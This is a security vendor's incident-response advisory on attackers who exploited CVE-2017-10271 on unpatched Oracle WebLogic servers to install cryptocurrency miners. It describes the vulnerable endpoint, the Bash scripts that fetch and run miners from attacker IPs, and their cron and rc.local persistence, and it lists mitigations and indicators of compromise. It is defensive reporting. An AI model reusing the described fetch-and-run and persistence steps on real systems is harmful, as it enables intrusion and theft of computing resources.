Report a Confirmed or Potential Breach? Call  +1 770-870-6343
0 Results Found
            Back To Results
              Login
              Threats & Defenses

              Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

              By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.
              By: Incident Response Team

              In December 2017, Secureworks® incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorized activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organizations have been affected.

              Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analyzing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this "easily exploitable" issue allows an "unauthenticated attacker with network access via HTTP to compromise [an] Oracle WebLogic Server."

              Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download "72 . 11 . 140 . 178/files/l/default" (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

              Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)

              The second script variation creates two persistence mechanisms based on the impacted service account name. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, then root.sh is downloaded to /etc/root.sh and executed. If the user account is anything else, lower.sh is downloaded to the /tmp directory and executed.

              Figure 2. Bash script identifying user. (Source: Secureworks)

              If root.sh is executed, it downloads and executes “nativesvc” from 207. 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file to continually check for the miner and download a new copy if the check fails. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named “river” from 207 . 246. 125 . 40 but does not create a persistence mechanism.

              Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

              These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

              In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

              • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
              • Review and apply appropriate security updates for operating systems and applications in a timely manner.
              • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorized users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
              • If possible, implement endpoint and network security technologies and centralized logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.

              The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

              Indicator

              Type

              Context

              faca70429c736dbf0caf2c644622078f

              MD5 hash

              Linux cryptocurrency miner

              f79a2ba735a988fa6f65988e1f3d39684727bdc4

              SHA1 hash

              Linux cryptocurrency miner

              bbc6f1e5f02b55fab111202b7ea2b3ef7b53209f6ce53f27d7f16c08f52ef9ac

              SHA256 hash

              Linux cryptocurrency miner

              9d4356274ca394807ae0a6ad82afe2a2

              MD5 hash

              Linux cryptocurrency miner

              b19ca7fec674543311214c25078ad7a4e1916253

              SHA1 hash

              Linux cryptocurrency miner

              5a788286f82fc78d01dbe2e11776aed1e90b604c12eb826986973e412e0714de

              SHA256 hash

              Linux cryptocurrency miner

              /tmp/rcp_bh

              Filename

              Linux cryptocurrency miner on disk

              /tmp/nativesvc

              Filename

              Linux cryptocurrency miner on disk

              /tmp/river

              Filename

              Linux cryptocurrency miner on disk

              /tmp/watch-smartd

              Filename

              Linux cryptocurrency miner on disk

              /tmp/Carbon

              Filename

              Linux cryptocurrency miner on disk

              pool . minexmr . com

              Domain name

              Associated with cryptocurrency mining activity

              pool . supportxmr . com

              Domain name

              Hosting cryptocurrency mining software

              72 . 11 . 140 . 178

              IP address

              Hosting cryptocurrency mining software

              207 . 246 . 68 . 21

              IP address

              Hosting cryptocurrency mining software

              191 . 101 . 180 . 84

              IP address

              Hosting downloader scripts for cryptocurrency mining software

              207 . 246 . 125 . 40

              IP address

              Hosting cryptocurrency mining software


              Table 1. Indicators for this threat.

              Related Content